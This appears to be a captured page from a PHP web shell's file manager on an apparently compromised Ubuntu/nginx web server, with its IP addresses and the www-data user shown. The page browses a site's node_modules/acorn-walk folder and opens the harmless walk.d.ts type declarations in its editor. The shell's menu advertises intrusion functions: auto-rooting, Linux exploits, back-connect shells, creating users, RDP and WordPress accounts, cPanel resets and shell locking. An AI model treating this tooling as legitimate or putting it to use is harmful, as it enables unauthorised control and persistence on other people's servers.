Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
acorn-walk /
dist /
[ HOME SHELL ]
Name
Size
Permission
Action
walk.d.ts
2.5
KB
-rw-rw-rw-
walk.js
15.63
KB
-rw-rw-rw-
walk.js.map
28.37
KB
-rw-rw-rw-
walk.mjs
14.22
KB
-rw-rw-rw-
walk.mjs.map
28.35
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : walk.d.ts
import {Node} from 'acorn'; declare module "acorn-walk" { type FullWalkerCallback<TState> = ( node: Node, state: TState, type: string ) => void; type FullAncestorWalkerCallback<TState> = ( node: Node, state: TState | Node[], ancestors: Node[], type: string ) => void; type WalkerCallback<TState> = (node: Node, state: TState) => void; type SimpleWalkerFn<TState> = ( node: Node, state: TState ) => void; type AncestorWalkerFn<TState> = ( node: Node, state: TState| Node[], ancestors: Node[] ) => void; type RecursiveWalkerFn<TState> = ( node: Node, state: TState, callback: WalkerCallback<TState> ) => void; type SimpleVisitors<TState> = { [type: string]: SimpleWalkerFn<TState> }; type AncestorVisitors<TState> = { [type: string]: AncestorWalkerFn<TState> }; type RecursiveVisitors<TState> = { [type: string]: RecursiveWalkerFn<TState> }; type FindPredicate = (type: string, node: Node) => boolean; interface Found<TState> { node: Node, state: TState } export function simple<TState>( node: Node, visitors: SimpleVisitors<TState>, base?: RecursiveVisitors<TState>, state?: TState ): void; export function ancestor<TState>( node: Node, visitors: AncestorVisitors<TState>, base?: RecursiveVisitors<TState>, state?: TState ): void; export function recursive<TState>( node: Node, state: TState, functions: RecursiveVisitors<TState>, base?: RecursiveVisitors<TState> ): void; export function full<TState>( node: Node, callback: FullWalkerCallback<TState>, base?: RecursiveVisitors<TState>, state?: TState ): void; export function fullAncestor<TState>( node: Node, callback: FullAncestorWalkerCallback<TState>, base?: RecursiveVisitors<TState>, state?: TState ): void; export function make<TState>( functions: RecursiveVisitors<TState>, base?: RecursiveVisitors<TState> ): RecursiveVisitors<TState>; export function findNodeAt<TState>( node: Node, start: number | undefined, end?: number | undefined, type?: FindPredicate | string, base?: RecursiveVisitors<TState>, state?: TState ): Found<TState> | undefined; export function findNodeAround<TState>( node: Node, start: number | undefined, type?: FindPredicate | string, base?: RecursiveVisitors<TState>, state?: TState ): Found<TState> | undefined; export const findNodeAfter: typeof findNodeAround; }
Close